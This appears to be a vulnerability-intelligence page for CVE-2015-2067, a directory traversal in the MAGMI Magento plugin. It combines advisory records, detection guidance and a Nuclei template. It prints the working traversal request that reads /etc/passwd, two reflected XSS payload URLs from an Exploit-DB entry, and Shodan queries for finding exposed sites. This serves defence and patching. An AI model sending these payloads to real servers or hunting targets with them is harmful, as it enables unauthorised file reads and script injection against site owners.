CVE-2015-2067
published 2015-02-24CVE-2015-2067: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read…
PriorityP274medium5CVSS 2.0
AVNACLAuNCPINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
39.42%
98.4th percentile
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dweeves | magmi | 0 – 0.7.21 | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility↗
commandGET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility↗
- →Detect exploitation attempts by monitoring GET requests to /magmi/web/ajax_pluginconf.php containing directory traversal sequences (../) in the 'file' parameter, particularly targeting /etc/passwd. ↗
- →Successful exploitation returns a valid HTTP 200 response with Unix /etc/passwd content matching the pattern 'root:.*:0:0:'. ↗
- →The attack uses query parameters plugintype=utilities and pluginclass=CustomSQLUtility alongside the traversal payload; filter for these parameter combinations in web logs. ↗
- →Use Shodan queries 'http.component:"Magento"' or 'http.component:"magento"' to identify exposed Magento instances that may be running the vulnerable MAGMI plugin. ↗
- ·The vulnerability is unauthenticated (Au:N) and network-accessible (AV:N) with low complexity (AC:L), meaning no credentials or special conditions are required to exploit it. ↗
- ·The EPSS score of 0.76384 (98.9th percentile) indicates this vulnerability has a very high probability of exploitation in the wild; prioritize detection and patching accordingly. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
MAGMI plugin for Magento Server Directory Traversal
osv·2022-05-13
CVE-2015-2067 [MEDIUM] MAGMI plugin for Magento Server Directory Traversal
MAGMI plugin for Magento Server Directory Traversal
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
GHSA
MAGMI plugin for Magento Server Directory Traversal
ghsa·2022-05-13
CVE-2015-2067 [MEDIUM] CWE-22 MAGMI plugin for Magento Server Directory Traversal
MAGMI plugin for Magento Server Directory Traversal
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
VulnCheck
magmi_project magmi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2015·CVSS 5.0
CVE-2015-2067 [MEDIUM] magmi_project magmi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
magmi_project magmi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected: magmi_project magmi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/
No detection rules found.
Exploit-DB
Magento Server MAGMI Plugin - Multiple Vulnerabilities
exploitdb·2015-02-05
CVE-2015-2068 Magento Server MAGMI Plugin - Multiple Vulnerabilities
Magento Server MAGMI Plugin - Multiple Vulnerabilities
---
Exploit Title: Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting
Software Link: http://sourceforge.net/projects/magmi/
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 5-2-2015
Exploit(Local file inclusion) :
http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
Screenshot: http://secupent.com/exploit/images/magmilfi.jpg
Exploit(Cross Site Scripting):
1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script
Nuclei
Magento Server MAGMI - Directory Traversal
nuclei·CVSS 5.0
CVE-2015-2067 [MEDIUM] Magento Server MAGMI - Directory Traversal
Magento Server MAGMI - Directory Traversal
Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Template:
id: CVE-2015-2067
info:
name: Magento Server MAGMI - Directory Traversal
author: daffainfo
severity: medium
description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server.
remediation: |
Apply the latest security patches and updates provided by Magento.
reference:
- h
http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.htmlhttp://www.exploit-db.com/exploits/35996http://www.securityfocus.com/bid/74881http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.htmlhttp://www.exploit-db.com/exploits/35996http://www.securityfocus.com/bid/74881
2015-02-24
Published
Exploited in the wild